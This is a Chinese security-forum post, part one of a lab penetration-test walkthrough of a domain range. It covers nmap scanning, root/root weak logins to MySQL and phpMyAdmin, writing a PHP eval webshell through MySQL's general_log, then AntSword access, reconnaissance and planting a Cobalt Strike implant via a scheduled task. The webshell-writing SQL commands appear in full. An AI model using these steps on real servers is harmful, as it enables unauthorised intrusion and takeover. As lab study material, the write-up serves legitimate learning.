安全矩阵

 找回密码
 立即注册
搜索
查看: 2407|回复: 0

实战打靶 - 巧用smb拿下不出网主机(上)

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-6-15 10:01:23 | 显示全部楼层 |阅读模式
原文链接:实战打靶 - 巧用smb拿下不出网主机(上)
0x01 前言

之前在打一个域环境的时候出现了域内主机不出网的情况,当时用的是cs的socks代理将不出网主机的流量代理到了边缘主机上。当时没有考虑太多,下来之后想到搭一个环境复现一下当时的情况,看有没有更简便的方法能够打下不出网的主机。

机缘巧合之下,发现了这个域环境还不错,再复现的过程中也有一些知识触及了我的知识盲区,也收获了许多新的知识。特地把过程记录下来,与想要学习打域内不出网主机的师傅们共同分享。

0x02 靶场地址分配
内网网段:192.168.52.0/24
外网网段:192.168.10.0/24

攻击机:
kali:192.168.10.11

靶场:
win7(内):192.168.52.143
win7(外):192.168.10.15

域内主机:
Winserver2003:192.168.52.141
Winserver2008:192.168.52.138



其中win7可以外网、内网通信,域内主机只能内网之间进行通信




一开始DCping不通win7,win7关闭防火墙之后可以ping通


打开C盘下的phpstudy目录打开web服务


0x03 web服务器渗透
nmap探测端口

nmap -sS -P0 -sV -O 192.168.10.15


开了80端口,尝试访问web地址,发现为php探针


滑到最底部,发现网站底部有一个MySQL数据库连接检测


弱口令root/root连接成功


扫描后台我这里用的是御剑,但是好像很拉,因为在我打完这个靶场之后再去网上看的时候发现他们很多扫出来一个cms,通过cms也能拿shell,这里我就不演示怎么用cms弱口令进后台写shell了,如果有感兴趣的小伙伴可以自行搜索一下


发现phpmyadmin目录,还是root/root弱口令登陆成功


进入后界面如下所示


通过phpmyadmin写shell通过phpmyadmin写shell有两种方式,首先我尝试select into outfile直接写入,但是他这里secure_file_priv的值为NULL,所以无法提权


只能使用另外一种方法,用全局日志写shell

SHOW VARIABLES LIKE '%general%'

查看配置,可以看到全局日志是处于关闭的状态,gengeral_log_file返回了日志的绝对地址


那这里我先把它的全局日志打开,再往它路径里面写入一个一句话木马

set global general_log = on;


开启全局日志后修改绝对路径,注意这里有一个坑,日志给我们返回的路径是C:\\phpStudy\\MySQL\\data\\stu1.log,但是mysql访问的绝对地址为C:\\phpStudy\\WWW目录下的文件,所以这个地方写shell必须要写到WWW目录下才能够用蚁剑连接上

set global general_log_file='C:\\phpStudy\\WWW\\shell.php';


这里再写入一句话木马

select '<?php eval($_POST[cmd]);?>'


然后再上蚁剑连接即可


可以看到连接成功


0x04 内网信息搜集
查看下系统的权限,一上来就是administrator权限就很舒服


ipconfig /all查看网络信息,域环境+双网卡



tasklist /svc粗略看了一下,似乎是没有杀软的


想着没有杀软,那么直接用最简单粗暴的上cs更省心,上传一个cs生成的木马exe到目标主机上


用计划任务上线cs


成功上线




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 08:04 , Processed in 0.013168 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表